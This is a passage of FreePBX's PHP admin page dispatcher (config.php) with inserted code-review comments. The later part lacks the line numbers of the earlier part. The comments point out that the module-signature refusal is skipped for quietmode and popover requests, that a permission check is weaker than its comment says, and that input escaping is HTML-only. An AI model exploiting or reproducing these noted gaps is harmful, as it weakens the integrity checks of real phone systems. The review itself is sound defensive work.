654 $override = $bmo->Config()->get('DASHBOARD_OVERRIDE');
655 if (empty($override)) {
656 $opmode = $bmo->Config()->get('FPBXOPMODE');
657 if ($opmode == 'basic') {
658 $override = $bmo->Config()->get('DASHBOARD_OVERRIDE_BASIC');
659 }
660 }
661
662 // Does this user have permission to use this?
// NOTE(review): despite the comment, the test is only that the override module is
// active, not that this user may see it; if the menu filter above removed the item,
// $fpbx_menu[$display] is unset and $cur_menuitem becomes null here.
663 if (is_array($active_modules) && isset($active_modules[$override])) {
664 // Yes.
665 $display = $override;
666 $cur_menuitem = $fpbx_menu[$display];
667 }
668}
669
// Output buffering starts here; the buffer is consumed by the quietmode / popover /
// full-page branches at the bottom of the file (partly beyond this excerpt).
670ob_start();
671// Run all the pre-processing for the page that's been requested.
// Runs for every non-empty $display except 'badrefer' -- including 'noauth' and
// 'noaccess' -- before anything is rendered.
672if (!empty($display) && $display != 'badrefer') {
673 // $CC is used by guielemets as a Global.
674 $CC = $currentcomponent = new component($display);
675
676 // BMO: Process ConfigPageInit functions
677 $bmo->Performance->Start("inits-$display");
678 $bmo->GuiHooks->doConfigPageInits($display, $currentcomponent);
679 $bmo->Performance->Stop("inits-$display");
680
681 // now run each 'process' function and 'gui' function
// processconfigpage() is where module form submissions are handled, so it runs before
// the page body is generated.
682 $bmo->Performance->Start("processconfigpage-$display");
683 $currentcomponent->processconfigpage();
684 $bmo->Performance->Stop("processconfigpage-$display");
685 $bmo->Performance->Start("buildconfigpage-$display");
686 $currentcomponent->buildconfigpage();
687 $bmo->Performance->Stop("buildconfigpage-$display");
688}
// Defaults for the page-dispatch variables consumed by the switch that follows: the
// 'modules'/'updates' and default cases overwrite them, the other cases leave them
// as empty strings so later isset()/string uses see defined values.
$module_name = $module_page = $module_file = '';
692
693// hack to have our default display handler show the "welcome" view
694// Note: this probably isn't REALLY needed if there is no menu item for "Welcome"..
695// but it doesn't really hurt, and it provides a handler in case some page links
696// to "?display=index"
697//TODO: acount for bad refer
// NOTE(review): $cur_menuitem is null when no menu item matched (e.g. the override case
// above, or 'badrefer'); the nested index read then operates on null -- the TODO is
// about that.
698if ($display == 'index' && ($cur_menuitem['module']['rawname'] == 'builtin')) {
699 $display = '';
700}
701
702// show the appropriate page
// Dispatch on the resolved $display. Everything echoed here lands in the output
// buffer opened above.
703switch($display) {
704 case 'updates':
705 case 'modules':
706 // set these to avoid undefined variable warnings later
707 //
708 $module_name = 'modules';
709 $module_page = $cur_menuitem['display'];
710 include 'page.modules.php';
711 break;
712 case 'noaccess':
713 show_view($amp_conf['VIEW_NOACCESS'], array('amp_conf' => &$amp_conf, 'display' => $display));
714 break;
715 case 'noauth':
716 // If we're a new install..
// Out-of-box experience first; showOOBE() returning true means it produced no output
// and the normal login view should still be shown.
717 $obecomplete = $bmo->OOBE->isComplete("noauth");
718 if (!$obecomplete) {
719 $ret = $bmo->OOBE->showOOBE("noauth");
720 } else {
721 $ret = false;
722 }
723
724 // Did we do anything? If we returned true, we didn't actually output anything
725 // So just keep going.
726 if ($obecomplete || $ret === true) {
727 // We're installed, we just need to log in.
// A username was submitted and we are still unauthenticated -> the credential check
// (which happens in bootstrap/ampuser, not in this file) failed. One generic message
// for both wrong user and wrong password.
728 $login['errors'] = array();
729 if ($config_vars['username'] && $action !== 'setup_admin') {
730 $login['errors'][] = _('Invalid Username or Password');
731 }
732
733 //show fop option if enabled, probobly doesnt belong on the
734 //login page
735 $login['panel'] = false;
736 if (!empty($amp_conf['FOPWEBROOT'])
737 && is_dir($amp_conf['FOPWEBROOT'])
738 ){
739 $login['panel'] = str_replace($amp_conf['AMPWEBROOT'] .'/admin/',
740 '', $amp_conf['FOPWEBROOT']);
741 }
742
743
744 $login['amp_conf'] = $amp_conf;
745 echo load_view($amp_conf['VIEW_LOGIN'], $login);
746 }
747 break;
748 case 'badrefer':
749 echo load_view($amp_conf['VIEW_BAD_REFFERER'], $amp_conf);
750 break;
751 case '':
// Welcome page; $astman is the Asterisk manager connection from bootstrap.
752 if ($astman) {
753 show_view($amp_conf['VIEW_WELCOME'], array('AMP_CONF' => &$amp_conf));
754 } else {
755 // no manager, no connection to asterisk
756 show_view($amp_conf['VIEW_WELCOME_NOMANAGER'],
757 array('mgruser' => $amp_conf["AMPMGRUSER"]));
758 }
759 break;
760 default:
// A module page. The file to include is built from the matched menu item's module
// rawname and display name (module metadata), not directly from the request; the
// request only selected which registered item matched.
761
762 $showpage = true;
763 if (!$fw_popover) {
764 /* Don't show OOBE in a popover. */
765 $obecomplete = $bmo->OOBE->isComplete();
766 if (!$obecomplete) {
767 $showpage = $bmo->OOBE->showOOBE();
768 }
769 }
770
771 if ($showpage === true) {
772
773 //display the appropriate module page
774 $module_name = $cur_menuitem['module']['rawname'];
775 $module_page = $cur_menuitem['display'];
776 $module_file = 'modules/'.$module_name.'/page.'.$module_page.'.php';
777
778 //TODO Determine which item is this module displaying.
779 //Currently this is over the place, we should standardize on a
780 //"itemid" request var for now, we'll just cover all possibilities :-(
// The first non-empty candidate wins as $itemid; every candidate present is
// HTML-escaped in place in $_REQUEST. This is HTML-context escaping applied at intake:
// downstream pages receive the escaped form (double-escaping if they escape again),
// and it is no protection for SQL or shell contexts.
781 $possibilites = array(
782 'userdisplay',
783 'extdisplay',
784 'id',
785 'itemid',
786 'selection'
787 );
788 $itemid = '';
789 foreach($possibilites as $possibility) {
790 if (isset($_REQUEST[$possibility]) && $_REQUEST[$possibility] != '' ) {
791 $itemid = htmlspecialchars($_REQUEST[$possibility], ENT_QUOTES);
792 $_REQUEST[$possibility] = $itemid;
793 }
794 }
795
796 // create a module_hook object for this module's page
797 $module_hook = moduleHook::create();
798
799 // populate object variables
800 $module_hook->install_hooks($module_page,$module_name,$itemid);
801
802 // let hooking modules process the $_REQUEST
803 $module_hook->process_hooks($itemid, $module_name, $module_page, $_REQUEST);
804
805 // BMO: Pre display hooks.
806 // getPreDisplay and getPostDisplay should probably never
807 // be used.
808 $bmo->GuiHooks->getPreDisplay($module_name, $_REQUEST);
809
810 // include the module page
811 if (isset($cur_menuitem['disabled']) && $cur_menuitem['disabled']) {
812 show_view($amp_conf['VIEW_MENUITEM_DISABLED'], $cur_menuitem);
813 break; // we break here to avoid the generateconfigpage() below
814 //
// Commercial (Zend-encoded) module whose licence check has not passed: show the Zend
// configuration view instead of the page.
815 } else if (file_exists($module_file) && class_exists('\Schmooze\Zend') && \Schmooze\Zend::fileIsLicensed($module_file) && !FreePBX::Modules()->loadLicensedFileCheck()) {
816 $amp_conf['VIEW_ZEND_CONFIG'] = empty($amp_conf['VIEW_ZEND_CONFIG']) ? 'views/zend_config.php' : $amp_conf['VIEW_ZEND_CONFIG'];
817
818 if (file_exists($amp_conf['VIEW_ZEND_CONFIG'])) {
819 echo load_view($amp_conf['VIEW_ZEND_CONFIG']);
820 } else {
821 die_freepbx(_("Your Zend Configuration is not fully setup. Please recitfy the problem and reload this page"));
822 }
823 } else if (file_exists($module_file)) {
824 //check module first and foremost, but not during quietmode
// Module-signature (GPG) maintenance and the security banners.
// NOTE(review): this block, and therefore the revoked-signature refusal below (which
// reads $gpgstatus set only here), runs only when SIGNATURECHECK is on and the request
// carries neither 'quietmode' nor 'fw_popover'. With either flag present $gpgstatus
// stays unset and the module file is included regardless of its signature state --
// confirm that is intended for AJAX/popover loads.
825 if(!isset($_REQUEST['quietmode']) && $amp_conf['SIGNATURECHECK'] && !isset($_REQUEST['fw_popover'])) {
826 //Since we are viewing this module update it's signature
827 $gpgstatus = module_functions::create()->updateSignature($module_name,false);
828 //check all cached signatures
829 $modules = module_functions::create()->getAllSignatures();
830
831 if(!$modules['validation']) {
832 //$type = (!empty($modules['statuses']['untrusted']) || !empty($modules['statuses']['tampered'])) ? 'danger' : 'warning';
833 $danger = array();
834 $warning = array();
835 //priority sorting
// Every status except 'unsigned' is reported as danger; 'unsigned' as a warning.
836 $stauses = array("revoked","untrusted","tampered","unsigned","unknown");
837 foreach($stauses as $st) {
838 if(!empty($modules['statuses'][$st]) && $st != 'unsigned') {
839 $danger = array_merge($danger,$modules['statuses'][$st]);
840 }else if(!empty($modules['statuses'][$st]) && $st == 'unsigned') {
841 $warning = array_merge($warning,$modules['statuses'][$st]);
842 }
843 }
// Other security notifications are prepended to the danger banner, except the
// framework's own signature notifications which are already covered above.
844 $d = FreePBX::notifications()->list_security(true);
845 foreach($d as $n) {
846 //Dont show the same notifications twice
847 if(!in_array($n['id'],array('FW_REVOKED','FW_UNSIGNED','FW_UNTRUSTED','FW_TAMPERED','FW_UNKNOWN'))) {
848 array_unshift($danger,$n['display_text']);
849 }
850 }
851 if(!empty($danger)) {
852 echo generate_message_banner(_('Security Warning'), 'danger',$danger,'http://wiki.freepbx.org/display/F2/Module+Signing',true);
853 }
854 if(!empty($warning)) {
855 echo generate_message_banner(_('Unsigned Module(s)'), 'warning',$warning,'http://wiki.freepbx.org/display/F2/Module+Signing',true);
856 }
857 if($amp_conf['PHP_CONSOLE']) {
858 $connector = PhpConsole\Connector::getInstance();
859 if(!$connector->isActiveClient()) {
860 echo generate_message_banner(_('PHP Console Enabled but not installed'), 'info',array(_('You have enabled PHP Console in Advanced settings but have not installed the Chrome Extension or you are not using Chrome')),'https://chrome.google.com/webstore/detail/php-console/nfhmhhlpfleoednkpnnnkolmclajemef',true);
861 }
862 }
863 }
864 }
// Refuse to load a page whose module signature has been revoked (only known when the
// signature block above ran).
865 if(isset($gpgstatus['status']) && ($gpgstatus['status'] & FreePBX\GPG::STATE_REVOKED)) {
866 echo sprintf(_("File %s has a revoked signature. Can not load"),$module_file);
867 break;
868 } else {
869 // load language info if available
870 modgettext::textdomain($module_name);
871 if ( isset($currentcomponent) ) {
872 $bmo->GuiHooks->doGUIHooks($module_name, $currentcomponent);
873 }
// A hooking module may take over rendering of this page entirely; otherwise the
// module's own page file is included.
874 if ($bmo->GuiHooks->needsIntercept($module_name, $module_file)) {
875 $bmo->Performance->Start("hooks-$module_name-$module_file");
876 $bmo->GuiHooks->doIntercept($module_name, $module_file);
877 $bmo->Performance->Stop("hooks-$module_name-$module_file");
878 } else {
879 $bmo->Performance->Start("includefile-$module_file");
880 include($module_file);
881 $bmo->Performance->Stop("includefile-$module_file");
882 }
883 }
884 } else {
// $module_file is echoed unescaped; it is composed from module metadata, not from the
// raw request.
885 echo sprintf(_("404 Not found (%s)"),$module_file);
886 }
887
888 // BMO TODO: Post display hooks.
889 $bmo->GuiHooks->getPostDisplay($module_name, $_REQUEST);
890
891 // global component
892 if ( isset($currentcomponent) ) {
893 modgettext::textdomain($module_name);
894 echo $currentcomponent->generateconfigpage();
895 }
896 }
897 break;
898}
899
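// ---------------------------------------------------------------------------
// Page assembly.
//
// Whatever the selected module printed above is sitting in the output buffer.
// Depending on the request mode this block either flushes it as-is (quiet
// mode), wraps it in a minimal popover frame (header + content + footer), or
// wraps it in the full admin page (header, menu, beta notice, content, footer
// with action/nav bars).
//
// Reads globals set earlier in this file: $quietmode, $fw_popover,
// $fw_popover_process, $amp_conf, $module_name, $module_page, $display,
// $fpbx_menu, $language, $benchmark_starttime, $bmo.
// ---------------------------------------------------------------------------
$header = array();
$footer = array();

if ($quietmode) {
	// send the output buffer, should be sending just the page contents.
	// '@' is kept on purpose: ob_end_flush() warns when no buffer is active.
	@ob_end_flush();
} elseif ($fw_popover || $fw_popover_process) {
	$admin_template = $template = array();
	//get the page contents from the buffer
	$content = ob_get_contents();
	@ob_end_clean();
	$fw_gui_html = '';

	// add header
	// Taken as is from the else just below this elseif
	// We're sending the popover, it needs a header if only for jQuery.
	// Already ok to pass popover awareness to header so popover.css is added
	$header['title'] = framework_server_name();
	$header['amp_conf'] = $amp_conf;
	$header['use_popover_css'] = ($fw_popover || $fw_popover_process);
	$o = FreePBX::create()->Less->generateMainStyles();
	$header['compiled_less_files'] = $o['compiled_less_files'];
	$header['extra_compiled_less_files'] = $o['extra_compiled_less_files'];

	//if we have a module loaded, load its css
	if (isset($module_name)) {
		$fw_gui_html .= framework_include_css();
		$header['module_name'] = $module_name;
	}

	show_view($amp_conf['VIEW_HEADER'], $header);

	// If processing posback (fw_popover_process) and there are errors then we
	// display again, otherwise we ignore the $content and prepare to process
	//
	$show_normal = $fw_popover_process ? fwmsg::errors() : true;
	if ($show_normal) {
		// provide beta status
		if (isset($fpbx_menu[$display]['beta']) && strtolower($fpbx_menu[$display]['beta']) == 'yes') {
			//TODO: Why is this in a global system variable?
			$fw_gui_html .= load_view($amp_conf['VIEW_BETA_NOTICE']);
		}
		$fw_gui_html .= $content;
		$popover_args['popover_mode'] = 'display';
	} else {
		$popover_args['popover_mode'] = 'process';
	}

	//send footer
	$o = FreePBX::create()->View->getScripts();
	$footer['compiled_scripts'] = $o;
	$footer['js_content'] = load_view($amp_conf['VIEW_POPOVER_JS'], $popover_args);
	$footer['lang'] = $language;
	// strict in_array: $display is request-derived, so a loose comparison could
	// match unexpected scalar values
	$footer['covert'] = in_array($display, array('noauth', 'badrefer'), true);
	$footer['extmap'] = !$footer['covert']
		? framework_get_extmap(true)
		: json_encode(array());
	$footer['module_name'] = $module_name;
	$footer['module_page'] = $module_page;
	$footer['benchmark_starttime'] = $benchmark_starttime;
	$footer['reload_needed'] = false; //we don't display the menu in this view so irrelivant
	//These changes will hide the excess footer which is just empty anyways, also it sets our body background to transparent
	//scripts in footer are still run eventhough it's hidden
	//hack into the footer and change the background to be transparent so it seems like we "belong" in the dialog box
	$footer['footer_content'] = "<script>$('body').css('background-color','transparent');$('#footer').hide()</script>";
	$footer['remove_rnav'] = true;
	$fw_gui_html .= load_view($amp_conf['VIEW_FOOTER'], $footer);
	echo $fw_gui_html;

} else {
	// Save the last module page normal view in the session. This is needed in some scenarios
	// such as a post back within a popOver destination box so that the drawselects() can be
	// properly generated within the context of the parent window that it will be filled back
	// in with.
	//
	$_SESSION['module_name'] = $module_name;
	$_SESSION['module_page'] = $module_page;

	$admin_template = $template = array();
	//get the page contents from the buffer
	$page_content = ob_get_contents();
	ob_end_clean();

	//add header
	$header['title'] = framework_server_name();
	$header['amp_conf'] = $amp_conf;
	$header['use_popover_css'] = ($fw_popover || $fw_popover_process);

	$o = FreePBX::create()->Less->generateMainStyles();
	$header['compiled_less_files'] = $o['compiled_less_files'];
	$header['extra_compiled_less_files'] = $o['extra_compiled_less_files'];

	//if we have a module loaded, load its css
	if (isset($module_name)) {
		$header['module_name'] = $module_name;
	}

	echo load_view($amp_conf['VIEW_HEADER'], $header);

	if (isset($module_name)) {
		echo framework_include_css();
	}

	// send menu
	$menu['fpbx_menu'] = $fpbx_menu; //array of modules & settings
	$menu['display'] = $display; //currently displayed item
	$menu['authtype'] = $amp_conf['AUTHTYPE'];
	$menu['reload_confirm'] = $amp_conf['RELOADCONFIRM'];
	$menu['language'] = array(
		'en_US' => _('English'). " (US)"
	);
	// The 'lang' cookie is client-supplied; it only picks the locale used to
	// render the language names below, it does not select a code path.
	$langKey = !empty($_COOKIE['lang']) ? $_COOKIE['lang'] : 'en_US';
	// available languages are the i18n sub-directories; the key is the directory name
	foreach(glob($amp_conf['AMPWEBROOT']."/admin/i18n/*",GLOB_ONLYDIR) as $langDir) {
		$lang = basename($langDir);
		$menu['language'][$lang] = function_exists('locale_get_display_name') ? locale_get_display_name($lang, $langKey) : $lang;
	}

	//add menu to final output
	echo load_view($amp_conf['VIEW_MENU'], $menu);

	// provide beta status
	if (isset($fpbx_menu[$display]['beta']) && strtolower($fpbx_menu[$display]['beta']) == 'yes') {
		echo load_view($amp_conf['VIEW_BETA_NOTICE']);
	}

	//FREEI-918 - if the uploaded file's size exceeds php's post_max_size, PHP drops
	//the _POST and _FILES values and continues with the request. There is no error value
	//to properly know what happened. Meeting this set of conditions is enough evidence
	//to assume module upload from Module Admin failed due to the file being too large.
	//The page_content is being overwritten to display an error and option to try again,
	//instead of going back to the admin dashboard/index
	//
	// All three inputs may be absent (no Referer header, no display parameter,
	// no Content-Length), so read them with defaults instead of indexing directly.
	// The Referer is client-supplied and only selects this error text; it never
	// changes state.
	$referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
	$requestDisplay = isset($_REQUEST['display']) ? $_REQUEST['display'] : null;
	$contentLength = isset($_SERVER['CONTENT_LENGTH']) ? (int) $_SERVER['CONTENT_LENGTH'] : 0;
	if ((preg_match('/config.php\?display=modules&action=upload/', $referer)
		|| preg_match('/config.php\?display=updates&action=upload/', $referer)) &&
		empty($_FILES) && empty($_POST) && $requestDisplay === 'index' &&
		$contentLength > 0)
	{
		$postMaxSize = ini_get('post_max_size');
		// NOTE: the gettext msgids below span lines; their exact text (including
		// the embedded newline) must stay as-is to keep matching the catalogues.
		$page_content =
'<div class="error">
<p>' .
_("There was an error uploading the module tar ball due to its size being greater than post_max_size {") . $postMaxSize . '}.<br>'.
_("Please host the file and use the \"Download (From Web) option\", or ssh to your FreePBX system and use
\"fwconsole ma downloadinstall [url]\" to install the module from a URL.") . "<br>" .
_("For further help, please contact") .
" <a href=\"https://support.sangoma.com\" target=\"_blank\">" . _("Sangoma Support") . "</a>."
.
'</p>
<input type="button" value="' . _("Go Back") . '" onclick="history.back()">
</div>';
	}

	//send actual page content
	echo $page_content;

	//send footer
	$o = FreePBX::create()->View->getScripts();
	$footer['compiled_scripts'] = $o;
	$footer['lang'] = $language;
	// strict in_array: $display is request-derived, so a loose comparison could
	// match unexpected scalar values
	$footer['covert'] = in_array($display, array('noauth', 'badrefer'), true);
	$footer['extmap'] = !$footer['covert'] ? framework_get_extmap(true) : json_encode(array());
	$footer['module_name'] = $module_name;
	$footer['module_page'] = $module_page;
	$footer['benchmark_starttime'] = $benchmark_starttime;
	$footer['reload_needed'] = $footer['covert'] ? false : check_reload_needed();
	$footer['footer_content'] = load_view($amp_conf['VIEW_FOOTER_CONTENT'], $footer);

	if (!$footer['covert'] && function_exists("sysadmin_hook_framework_footer_view")) {
		$footer['sysadmin'] = sysadmin_hook_framework_footer_view();
	}

	// covert pages (noauth/badrefer) are rendered without the authenticated chrome
	if ($footer['covert']) {
		$footer['no_auth'] = true;
	}

	$footer['action_bar'] = null;
	//See if we should provide an action bar
	try {
		$bmomodule_name = $bmo->Modules->cleanModuleName($module_name);
		if($bmo->Modules->moduleHasMethod($bmomodule_name,"getActionBar")) {
			$ab = $bmo->$bmomodule_name->getActionBar($_REQUEST);
			if(is_array($ab)) {
				//submit, duplicate, reset, delete.
				//http://issues.freepbx.org/browse/FREEPBX-10611
				uksort($ab, function($a, $b) {
					$order = array(
						"submit",
						"duplicate",
						"reset",
						"delete"
					);
					// strict search: integer keys must not loosely match the names
					$posA = array_search($a, $order, true);
					if($posA === false) {
						$posA = 999;
					}
					$posB = array_search($b, $order, true);
					if($posB === false) {
						$posB = 999;
					}
					// a comparator must return 0 on a tie (two unknown keys both at 999);
					// never returning 0 leaves the order of unknown keys undefined
					if($posA == $posB) {
						return 0;
					}
					return ($posA < $posB) ? -1 : 1;
				});
				$footer['action_bar'] = $ab;
			} else {
				$footer['action_bar'] = array();
			}
		}
	} catch (Exception $e) {
		// best effort: a failing module must not break page rendering, but do record it
		error_log('config.php: action bar lookup failed: ' . $e->getMessage());
	}
	$footer['nav_bar'] = null;
	//See if we should provide a right-hand nav bar
	try {
		$bmomodule_name = $bmo->Modules->cleanModuleName($module_name);
		if($bmo->Modules->moduleHasMethod($bmomodule_name,"getRightNav")) {
			$footer['nav_bar'] = $bmo->$bmomodule_name->getRightNav($_REQUEST);
		}
	} catch (Exception $e) {
		// best effort, as above
		error_log('config.php: right nav lookup failed: ' . $e->getMessage());
	}
	echo load_view($amp_conf['VIEW_FOOTER'], $footer);
}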
1117}